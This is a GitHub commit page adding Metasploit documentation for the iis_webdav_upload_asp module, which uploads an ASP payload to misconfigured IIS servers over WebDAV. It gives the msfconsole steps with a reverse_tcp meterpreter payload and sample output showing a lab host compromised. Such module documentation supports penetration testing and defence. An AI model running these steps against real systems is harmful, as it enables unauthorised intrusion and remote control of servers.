forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land rapid7#8180 docs for iis_webdav_upload_asp
- Loading branch information
Showing
1 changed file
with
49 additions
and
0 deletions.
There are no files selected for viewing
49 changes: 49 additions & 0 deletions
49
documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,49 @@ | ||
| ## Description | ||
|
|
||
| This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. | ||
|
|
||
| **IMPORTANT:** The target IIS machine must meet these conditions to be considered as exploitable: | ||
|
|
||
| 1. It allows 'Script resource access'. | ||
| 2. It allows Read and Write permission. | ||
| 3. It supports ASP. | ||
|
|
||
| ## WebDAV | ||
|
|
||
| Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Do: ```use exploit/windows/iis/iis_webdav_upload_asp``` | ||
| 2. Do: ```set payload windows/meterpreter/reverse_tcp``` | ||
| 2. Do: ```set LHOST [IP]``` | ||
| 3. Do: ```set RHOST [IP]``` | ||
| 3. Do: ```set PATH / [PATH]``` | ||
| 4. Do: ```run``` | ||
|
|
||
| ## Sample Output | ||
|
|
||
| ``` | ||
| msf > use exploit/windows/iis/iis_webdav_upload_asp | ||
| msf exploit(iis_webdav_upload_asp) > set payload windows/meterpreter/reverse_tcp | ||
| payload => windows/meterpreter/reverse_tcp | ||
| msf exploit(iis_webdav_upload_asp) > set RHOST 172.16.176.54 | ||
| RHOST => 172.16.176.54 | ||
| msf exploit(iis_webdav_upload_asp) > set LHOST 172.16.176.56 | ||
| LHOST => 172.16.176.54 | ||
| msf exploit(iis_webdav_upload_asp) > set path /upload/test.asp | ||
| path => /upload/test.asp | ||
| msf exploit(iis_webdav_upload_asp) > exploit | ||
| [*] Started reverse handler on 172.16.176.56:4444 | ||
| [*] Uploading 613830 bytes to /upload/test.txt... | ||
| [*] Moving /upload/test.txt to /upload/test.asp... | ||
| [*] Executing /upload/test.asp... | ||
| [*] Sending stage (770048 bytes) to 172.16.176.54 | ||
| [*] Deleting /upload/test.asp, this doesn't always work... | ||
| [!] Deletion failed on /upload/test.asp [403 Forbidden] | ||
| meterpreter > getuid | ||
| Server username: JUAN-C0DE875735\IWAM_JUAN-C0DE875735 | ||
| meterpreter > | ||
| ``` |